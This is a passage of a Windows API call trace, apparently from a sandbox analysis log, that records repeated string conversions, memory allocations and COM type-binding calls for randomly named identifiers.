ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x1202 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x1202) returned 0x0 [0060.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700106, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="oFy1j") returned 6 [0060.529] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="oFy1j", lHashVal=0x1055cc, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x1202 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x1202) returned 0x0 [0060.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700106, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="oFy1j") returned 6 [0060.530] ITypeComp:RemoteBind (in: This=0x87cef08, szName="oFy1j", lHashVal=0x1055cc, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x1202 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x1202) returned 0x0 [0060.530] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.530] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x6, _Src=0x5700106 | out: _Dst=0x87fc6e0) returned 0x0 [0060.530] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc23ca, cbMultiByte=13, lpWideCharStr=0x345c34, cchWideChar=14 | out: lpWideCharStr="_B_var_oFy1j") returned 13 [0060.531] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_oFy1j", lHashVal=0x1019b9, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.531] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700106 | out: _Dst=0x345c9c) returned 0x0 [0060.531] CRetailMalloc_Free () returned 0x6c80301 [0060.531] ITypeComp:RemoteBind (in: This=0x87ce890, szName="pqC3DwO", lHashVal=0x10fb88, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x1204 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x1204) returned 0x0 [0060.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570012a, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="pqC3DwO") returned 8 [0060.531] ITypeComp:RemoteBind (in: This=0x87ce668, szName="pqC3DwO", lHashVal=0x10fb88, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x1204 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x1204) returned 0x0 [0060.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570012a, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="pqC3DwO") returned 8 [0060.531] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="pqC3DwO", lHashVal=0x10fb88, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x1204 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x1204) returned 0x0 [0060.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570012a, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="pqC3DwO") returned 8 [0060.532] ITypeComp:RemoteBind (in: This=0x87cef08, szName="pqC3DwO", lHashVal=0x10fb88, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x1204 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x1204) returned 0x0 [0060.532] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.532] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x8, _Src=0x570012a | out: _Dst=0x87fc6e0) returned 0x0 [0060.533] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc23f6, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_pqC3DwO") returned 15 [0060.533] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x570012a | out: _Dst=0x345c9c) returned 0x0 [0060.533] CRetailMalloc_Free () returned 0x6c80301 [0060.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570014e, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="gAqP2sk") returned 8 [0060.534] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x8, _Src=0x570014e | out: _Dst=0x87fc6e0) returned 0x0 [0060.534] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2422, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_gAqP2sk") returned 15 [0060.534] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x570014e | out: _Dst=0x345c9c) returned 0x0 [0060.534] CRetailMalloc_Free () returned 0x6c80301 [0060.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700172, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="Sx2T8vWo") returned 9 [0060.535] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x9, _Src=0x5700172 | out: _Dst=0x87fc6e0) returned 0x0 [0060.536] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc244e, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_Sx2T8vWo") returned 16 [0060.536] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700172 | out: _Dst=0x345c9c) returned 0x0 [0060.536] CRetailMalloc_Free () returned 0x6c80301 [0060.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570019a, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="o83MAhXH") returned 9 [0060.536] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x9, _Src=0x570019a | out: _Dst=0x87fc6e0) returned 0x0 [0060.537] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc247a, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_o83MAhXH") returned 16 [0060.537] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x570019a | out: _Dst=0x345c9c) returned 0x0 [0060.537] CRetailMalloc_Free () returned 0x6c80301 [0060.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57001c2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="CxbNQqXP") returned 9 [0060.538] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x9, _Src=0x57001c2 | out: _Dst=0x87fc6e0) returned 0x0 [0060.538] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc24a6, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_CxbNQqXP") returned 16 [0060.538] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x57001c2 | out: _Dst=0x345c9c) returned 0x0 [0060.538] CRetailMalloc_Free () returned 0x6c80301 [0060.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57001ea, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="JARWbcHyX") returned 10 [0060.539] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x57001ea | out: _Dst=0x874fba0) returned 0x0 [0060.670] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc24d2, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_JARWbcHyX") returned 17 [0060.670] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x57001ea | out: _Dst=0x345c9c) returned 0x0 [0060.670] CRetailMalloc_Free () returned 0x18460101 [0060.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700212, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="w4zynwl") returned 8 [0060.671] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700212 | out: _Dst=0x87fc800) returned 0x0 [0060.671] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2502, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_w4zynwl") returned 15 [0060.672] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700212 | out: _Dst=0x345c9c) returned 0x0 [0060.672] CRetailMalloc_Free () returned 0x7010201 [0060.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700236, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="MK3t5Up") returned 8 [0060.673] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700236 | out: _Dst=0x87fc800) returned 0x0 [0060.673] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc252e, cbMultiByte=15, lpWideCharStr=0x345c34, cchWideChar=16 | out: lpWideCharStr="_B_var_MK3t5Up") returned 15 [0060.673] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700236 | out: _Dst=0x345c9c) returned 0x0 [0060.673] CRetailMalloc_Free () returned 0x7010201 [0060.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570025a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="l6wcSt") returned 7 [0060.674] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x570025a | out: _Dst=0x87fc800) returned 0x0 [0060.675] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc255a, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_l6wcSt") returned 14 [0060.675] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x570025a | out: _Dst=0x345c9c) returned 0x0 [0060.675] CRetailMalloc_Free () returned 0x7010201 [0060.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x570027e, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="lomE3U7C") returned 9 [0060.675] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x570027e | out: _Dst=0x87fc800) returned 0x0 [0060.676] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2586, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_lomE3U7C") returned 16 [0060.676] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x570027e | out: _Dst=0x345c9c) returned 0x0 [0060.676] CRetailMalloc_Free () returned 0x7010201 [0060.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57002a6, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="jCKaw8") returned 7 [0060.677] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x57002a6 | out: _Dst=0x87fc800) returned 0x0 [0060.677] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc25b2, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_jCKaw8") returned 14 [0060.678] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x57002a6 | out: _Dst=0x345c9c) returned 0x0 [0060.678] CRetailMalloc_Free () returned 0x7010201 [0060.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57002ca, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="TsSRwY") returned 7 [0060.678] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x57002ca | out: _Dst=0x87fc800) returned 0x0 [0060.679] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc25de, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_TsSRwY") returned 14 [0060.679] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x57002ca | out: _Dst=0x345c9c) returned 0x0 [0060.679] CRetailMalloc_Free () returned 0x7010201 [0060.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57002ee, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="Ghj4NGuF") returned 9 [0060.679] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x57002ee | out: _Dst=0x87fc800) returned 0x0 [0060.680] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc260a, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_Ghj4NGuF") returned 16 [0060.680] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x57002ee | out: _Dst=0x345c9c) returned 0x0 [0060.680] CRetailMalloc_Free () returned 0x7010201 [0060.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700316, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="ClejLi") returned 7 [0060.681] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700316 | out: _Dst=0x87fc800) returned 0x0 [0060.681] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2636, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_ClejLi") returned 14 [0060.681] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700316 | out: _Dst=0x345c9c) returned 0x0 [0060.681] CRetailMalloc_Free () returned 0x7010201 [0060.681] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x570033a | out: _Dst=0x87fc800) returned 0x0 [0060.682] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x570033a | out: _Dst=0x345c9c) returned 0x0 [0060.682] CRetailMalloc_Free () returned 0x7010201 [0060.682] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700362 | out: _Dst=0x87fc800) returned 0x0 [0060.682] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700362 | out: _Dst=0x345c9c) returned 0x0 [0060.682] CRetailMalloc_Free () returned 0x7010201 [0060.682] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700386 | out: _Dst=0x87fc800) returned 0x0 [0060.682] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700386 | out: _Dst=0x345c9c) returned 0x0 [0060.682] CRetailMalloc_Free () returned 0x7010201 [0060.683] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x57003ae | out: _Dst=0x87fc800) returned 0x0 [0060.683] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x57003ae | out: _Dst=0x345c9c) returned 0x0 [0060.683] CRetailMalloc_Free () returned 0x7010201 [0060.683] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x57003f6 | out: _Dst=0x87fc800) returned 0x0 [0060.683] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x57003f6 | out: _Dst=0x345c9c) returned 0x0 [0060.683] CRetailMalloc_Free () returned 0x7010201 [0060.683] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x57003d2 | out: _Dst=0x87fc800) returned 0x0 [0060.684] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x57003d2 | out: _Dst=0x345c9c) returned 0x0 [0060.684] CRetailMalloc_Free () returned 0x7010201 [0060.684] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x570041a | out: _Dst=0x87fc800) returned 0x0 [0060.684] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x570041a | out: _Dst=0x345c9c) returned 0x0 [0060.684] CRetailMalloc_Free () returned 0x7010201 [0060.684] CRetailMalloc_Realloc () returned 0x88bbee0 [0060.686] CRetailMalloc_Alloc () returned 0x87fc800 [0060.686] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x5700442 | out: _Dst=0x87fc800) returned 0x0 [0060.686] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x5700442 | out: _Dst=0x345c9c) returned 0x0 [0060.686] CRetailMalloc_Free () returned 0x7010201 [0060.686] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700466 | out: _Dst=0x87fc800) returned 0x0 [0060.687] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700466 | out: _Dst=0x345c9c) returned 0x0 [0060.687] CRetailMalloc_Free () returned 0x7010201 [0060.687] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x570048a | out: _Dst=0x874fba0) returned 0x0 [0060.687] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x570048a | out: _Dst=0x345c9c) returned 0x0 [0060.687] CRetailMalloc_Free () returned 0x18460101 [0060.687] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x57004b2 | out: _Dst=0x874fba0) returned 0x0 [0060.688] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x57004b2 | out: _Dst=0x345c9c) returned 0x0 [0060.688] CRetailMalloc_Free () returned 0x18460101 [0060.688] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700502 | out: _Dst=0x87fc800) returned 0x0 [0060.688] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700502 | out: _Dst=0x345c9c) returned 0x0 [0060.688] CRetailMalloc_Free () returned 0x7010201 [0060.688] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x57004da | out: _Dst=0x874fba0) returned 0x0 [0060.688] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x57004da | out: _Dst=0x345c9c) returned 0x0 [0060.689] CRetailMalloc_Free () returned 0x18460101 [0060.689] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x570052a | out: _Dst=0x87fc800) returned 0x0 [0060.689] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x570052a | out: _Dst=0x345c9c) returned 0x0 [0060.689] CRetailMalloc_Free () returned 0x7010201 [0060.689] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x570054e | out: _Dst=0x87fc800) returned 0x0 [0060.689] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x570054e | out: _Dst=0x345c9c) returned 0x0 [0060.690] CRetailMalloc_Free () returned 0x7010201 [0060.690] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700576 | out: _Dst=0x874fba0) returned 0x0 [0060.690] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700576 | out: _Dst=0x345c9c) returned 0x0 [0060.690] CRetailMalloc_Free () returned 0x18460101 [0060.690] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x570059e | out: _Dst=0x87fc800) returned 0x0 [0060.690] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x570059e | out: _Dst=0x345c9c) returned 0x0 [0060.690] CRetailMalloc_Free () returned 0x7010201 [0060.691] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x57005c6 | out: _Dst=0x87fc800) returned 0x0 [0060.691] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x57005c6 | out: _Dst=0x345c9c) returned 0x0 [0060.691] CRetailMalloc_Free () returned 0x7010201 [0060.691] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x57005ea | out: _Dst=0x87fc800) returned 0x0 [0060.691] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x57005ea | out: _Dst=0x345c9c) returned 0x0 [0060.692] CRetailMalloc_Free () returned 0x7010201 [0060.692] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x570060e | out: _Dst=0x87fc800) returned 0x0 [0060.692] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x570060e | out: _Dst=0x345c9c) returned 0x0 [0060.692] CRetailMalloc_Free () returned 0x7010201 [0060.692] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x5700632 | out: _Dst=0x87fc800) returned 0x0 [0060.692] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x5700632 | out: _Dst=0x345c9c) returned 0x0 [0060.692] CRetailMalloc_Free () returned 0x7010201 [0060.693] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x570065a | out: _Dst=0x874fba0) returned 0x0 [0060.693] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x570065a | out: _Dst=0x345c9c) returned 0x0 [0060.693] CRetailMalloc_Free () returned 0x18460101 [0060.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5700682, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="U4YDpH") returned 7 [0060.693] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700682 | out: _Dst=0x87fc800) returned 0x0 [0060.694] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700682 | out: _Dst=0x345c9c) returned 0x0 [0060.694] CRetailMalloc_Free () returned 0x7010201 [0060.694] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x57006a6 | out: _Dst=0x87fc800) returned 0x0 [0060.694] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x57006a6 | out: _Dst=0x345c9c) returned 0x0 [0060.694] CRetailMalloc_Free () returned 0x7010201 [0060.694] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x57006ca | out: _Dst=0x87fc800) returned 0x0 [0060.695] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x57006ca | out: _Dst=0x345c9c) returned 0x0 [0060.695] CRetailMalloc_Free () returned 0x7010201 [0060.695] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x9, _Src=0x57006ee | out: _Dst=0x87fc800) returned 0x0 [0060.695] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x57006ee | out: _Dst=0x345c9c) returned 0x0 [0060.695] CRetailMalloc_Free () returned 0x7010201 [0060.695] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x5700716 | out: _Dst=0x874fba0) returned 0x0 [0060.695] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x5700716 | out: _Dst=0x345c9c) returned 0x0 [0060.696] CRetailMalloc_Free () returned 0x18460101 [0060.696] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x570073e | out: _Dst=0x87fc800) returned 0x0 [0060.696] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x570073e | out: _Dst=0x345c9c) returned 0x0 [0060.696] CRetailMalloc_Free () returned 0x7010201 [0060.696] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x5700762 | out: _Dst=0x87fc800) returned 0x0 [0060.696] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x5700762 | out: _Dst=0x345c9c) returned 0x0 [0060.697] CRetailMalloc_Free () returned 0x7010201 [0060.697] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x6, _Src=0x5700786 | out: _Dst=0x87fc800) returned 0x0 [0060.697] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x5700786 | out: _Dst=0x345c9c) returned 0x0 [0060.697] CRetailMalloc_Free () returned 0x7010201 [0060.697] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x57007ce | out: _Dst=0x87fc800) returned 0x0 [0060.697] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x57007ce | out: _Dst=0x345c9c) returned 0x0 [0060.697] CRetailMalloc_Free () returned 0x7010201 [0060.698] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x8, _Src=0x57007aa | out: _Dst=0x87fc800) returned 0x0 [0060.698] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x57007aa | out: _Dst=0x345c9c) returned 0x0 [0060.698] CRetailMalloc_Free () returned 0x7010201 [0060.698] _mbscpy_s (in: _Dst=0x87fc800, _DstSizeInBytes=0x7, _Src=0x57007f2 | out: _Dst=0x87fc800) returned 0x0 [0060.698] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x57007f2 | out: _Dst=0x345c9c) returned 0x0 [0060.698] CRetailMalloc_Free () returned 0x7010201 